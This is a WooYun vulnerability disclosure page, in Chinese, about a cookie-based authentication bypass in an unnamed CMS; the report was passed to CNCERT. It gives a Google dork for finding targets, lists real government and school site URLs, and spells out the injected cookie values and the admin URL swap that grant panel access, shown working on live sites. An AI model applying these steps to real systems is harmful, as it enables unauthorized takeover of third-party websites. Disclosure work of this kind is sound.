当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061278

漏洞标题:某CMS认证缺陷导致通用型cookie劫持#涉及大量政府、教育机构站点

相关厂商:cncert国家互联网应急中心

漏洞作者: 从容

提交时间:2014-06-24 15:51

修复时间:2014-08-08 15:52

公开时间:2014-08-08 15:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-28: 厂商已经确认,细节仅向厂商公开
2014-07-01: 细节向第三方安全合作伙伴开放
2014-08-22: 细节向核心白帽子及相关领域专家公开
2014-09-01: 细节向普通白帽子公开
2014-09-11: 细节向实习白帽子公开
2014-08-08: 细节向公众公开

简要描述:

某CMS认证缺陷导致通用型cookie劫持#涉及大量政府、教育机构站点
直接打进后台- -.
装病-请假-旷课- -.爽歪歪:)

详细说明:

某CMS认证缺陷导致通用型cookie劫持#涉及大量政府、教育机构站点
直接打进后台- -.
Google关键字:

inurl:szwyadmin/login.asp


成功率80%

QQ截图20140518132609.png


涉及到的重要网站:

吉林农业大学果树栽培学
http://202.198.0.22/jiaowu/zpx/
佛山科学技术学院分站
http://www.fosu.edu.cn/business/party/party1/guomao/
科尔沁区人大常委会
http://www.keerqin.gov.cn/kqrd/
重庆市开县巨龙中等职业学校
http://www.kxjl.org/
大连富海外语培训学校
http://www.dlwaiyu.com/
北方民族大学
http://www.nun.edu.cn/
枣庄经贸工程职业学校
http://www.zzjjx.net/
建筑与土木工程学院分站
http://sace.imust.cn/jzs/
南京健诚职业学校
http://www.njjcedu.com/
浙江交通职业技术学校
http://jyfw.zjvtit.edu.cn/cjb/
机械工业苏州高级技工学校
http://www.xn--fiqr2vlzer5bvx8ehel.com/
浙江树人大学基础部
http://jcb.zjsru.edu.cn/
浙江水利水电学院分站
http://glxyl.zjweu.edu.cn/
重庆交通大学分站
http://courses.cqjtu.edu.cn/


还有好多好多,搞得我手都软了- -.

漏洞证明:

随便拿几个测试下吧- -.
http://202.198.0.22/jiaowu/zpx/szwyadmin/login.asp
添加三个自定义cookie

adminuser='or'='or'
adminpass='or'='or'
admindj=1


QQ截图20140518132724.png


添加完自定义cookie后,在地址栏将login.asp改成admin_index.asp,然后回车- -.


QQ截图20140518133824.png


QQ截图20140518133122.png


QQ截图20140518133141.png


成功打进后台,各种操作、添加删除新闻、更改密码、上传文件、服务器信息等等一览无云- -.
在展示下几个吧 :)

http://www.fosu.edu.cn/business/party/party1/guomao/szwyadmin/login.asp


QQ截图20140518134226.png


QQ截图20140518134246.png


http://www.keerqin.gov.cn/kqrd/szwyadmin/login.asp


QQ截图20140518134744.png


QQ截图20140518134806.png


http://www.nwsni.edu.cn/office/szwyadmin/login.asp


QQ截图20140518135102.png


18135219479f3c0221644c255ab6e90c8b01ecac.png.jpg


http://xcb.zkvtc.edu.cn/zyxqw/szwyadmin/login.asp


QQ截图20140518140118.png


QQ截图20140518140131.png

修复方案:

安全测试
勿查水表
:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-28 22:43

厂商回复:

CNVD未能确认软件生产厂商,已经根据测试实例,转由CNCERT发给上海交通大学验证和对应的分中心处置,并同步发送给教育网应急组织赛尔网络公司,抄报CCERT处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-24 16:27 | cncert国家互联网应急中心(乌云厂商)

    mark,这个好象比较少见。

  2. 2014-06-24 16:30 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @cncert国家互联网应急中心 那就审核吧~嘻嘻~为什么非要四天后审核呢?

  3. 2014-06-24 16:37 | cncert国家互联网应急中心(乌云厂商)

    @从容 验完了,留点处置时间。放心吧,高分。

  4. 2014-06-24 16:42 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @cncert国家互联网应急中心 嘿嘿,高分也没用....因为这是小厂商流程....诶...

  5. 2014-06-26 17:02 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @疯狗 这个不应该小厂商流程吧…

  6. 2014-07-19 12:48 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @从容 这么我改了不行啊

  7. 2014-07-19 14:50 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    仔细看完这个漏洞 我想说......哎,还是不说啦~留点面子